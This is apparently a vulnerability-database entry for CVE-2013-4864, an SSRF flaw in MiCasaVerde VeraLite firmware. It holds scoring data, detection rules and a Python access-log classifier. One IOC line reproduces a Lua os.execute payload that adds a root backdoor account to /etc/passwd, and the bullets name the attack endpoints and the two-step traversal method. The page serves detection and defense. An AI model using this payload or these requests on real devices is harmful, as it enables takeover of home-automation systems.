CVE-2013-4864
Published: 2020-01-28
Priority: P2 (63) · critical · CVSS 3.1: 9.8
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 6.31% (92.7th percentile)
MiCasaVerde VeraLite with firmware 1.5.408 allows remote attackers to send HTTP requests to intranet servers via the url parameter to cgi-bin/cmh/proxy.sh, related to a Server-Side Request Forgery (SSRF) issue.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| micasaverde | veralite_firmware | — | — |
Detection & IOCs (extracted from sources)
Command: os.execute("echo 'backdoor%3a%3a0%3a0%3aBackdoor Root Account%3a/tmp%3a/bin/ash' %3e%3e /etc/passwd")
- Detect SSRF exploitation attempts by monitoring HTTP GET requests to /cgi-bin/cmh/proxy.sh with a 'url' parameter pointing to internal or external hosts.
- Detect path traversal attempts via GET requests to /cgi-bin/cmh/get_file.sh with a 'filename' parameter containing '../' sequences.
- Detect privilege escalation via the firmware update endpoint by monitoring GET requests to /upgrade_step2.sh with a 'squashfs' parameter referencing a remote URL.
- Detect sensitive file exfiltration attempts via GET requests to /cgi-bin/cmh/backup.sh with the 'external=1' parameter.
- Detect backdoor account creation via Lua RunLua payloads containing 'os.execute' with echo commands writing to /etc/passwd.
- The path traversal via get_file.sh requires the target directory to exist first; it can be pre-created using store_file.sh, meaning exploitation is a two-step process.
- The SSRF and other attacks can also be launched through the Internet-based control panel at cp.mios.com when authenticated as admin or guest, extending the attack surface beyond the LAN.
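The request patterns listed above, applied to access-log entries as an added example (not code from this page or its sources). It assumes a combined-format HTTP access log from a proxy or sensor in front of the device; the rule names, sample entries, and the Lua request path and parameter are constructed placeholders, and the Lua rule matches any GET query because the page names no endpoint for it.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request line inside a combined-format access log entry (format is an assumption).
REQ = re.compile(r'"GET (?P<target>\S+) HTTP/[\d.]+"')
SCHEME = re.compile(r"(?i)^[a-z][a-z0-9+.-]*://")

def classify(line):
    """Return the names of the page's detection rules that one log line matches."""
    m = REQ.search(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    # parse_qs decodes once; decode again to catch double-encoded values.
    params = {k: [unquote(v) for v in vs]
              for k, vs in parse_qs(parts.query, keep_blank_values=True).items()}
    query = unquote(unquote(parts.query))
    path, hits = parts.path, []
    if path.endswith("/cgi-bin/cmh/proxy.sh") and "url" in params:
        hits.append("ssrf-proxy")
    if path.endswith("/cgi-bin/cmh/get_file.sh") and any(
            "../" in v for v in params.get("filename", [])):
        hits.append("path-traversal")
    if path.endswith("/upgrade_step2.sh") and any(
            SCHEME.match(v) for v in params.get("squashfs", [])):
        hits.append("remote-firmware")
    if path.endswith("/cgi-bin/cmh/backup.sh") and "1" in params.get("external", []):
        hits.append("backup-export")
    if "os.execute" in query and "/etc/passwd" in query:
        hits.append("lua-passwd-write")
    return hits

# Constructed sample entries (documentation IP ranges, placeholder Lua path and parameter).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/cmh/proxy.sh?url=http://192.0.2.10/ HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/cmh/get_file.sh?filename=..%2f..%2fconstructed.txt HTTP/1.1" 200 64',
    '203.0.113.5 - - [01/Jan/2024:10:00:09 +0000] "GET /upgrade_step2.sh?squashfs=http://198.51.100.7/constructed.img HTTP/1.1" 200 0',
    '203.0.113.5 - - [01/Jan/2024:10:00:12 +0000] "GET /cgi-bin/cmh/backup.sh?external=1 HTTP/1.1" 200 2048',
    '203.0.113.5 - - [01/Jan/2024:10:00:15 +0000] "GET /PLACEHOLDER_LUA_PATH?placeholder_param=os.execute(%22echo%20x%20%3e%3e%20/etc/passwd%22) HTTP/1.1" 200 2',
    '192.0.2.44 - - [01/Jan/2024:10:01:00 +0000] "GET /cgi-bin/cmh/backup.sh HTTP/1.1" 200 2048',
]

def scan(lines):
    """Map each matching line index to the rules it triggered."""
    return {i: h for i, line in enumerate(lines) if (h := classify(line))}

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_LOG).items():
        print(idx, ",".join(rules))
```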
CVSS provenance
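| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |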
- http://packetstormsecurity.com/files/122654/MiCasaVerde-VeraLite-1.5.408-Traversal-Authorization-CSRF-Disclosure.html
- http://www.exploit-db.com/exploits/27286
- https://www3.trustwave.com/spiderlabs/advisories/TWSL2013-019.txt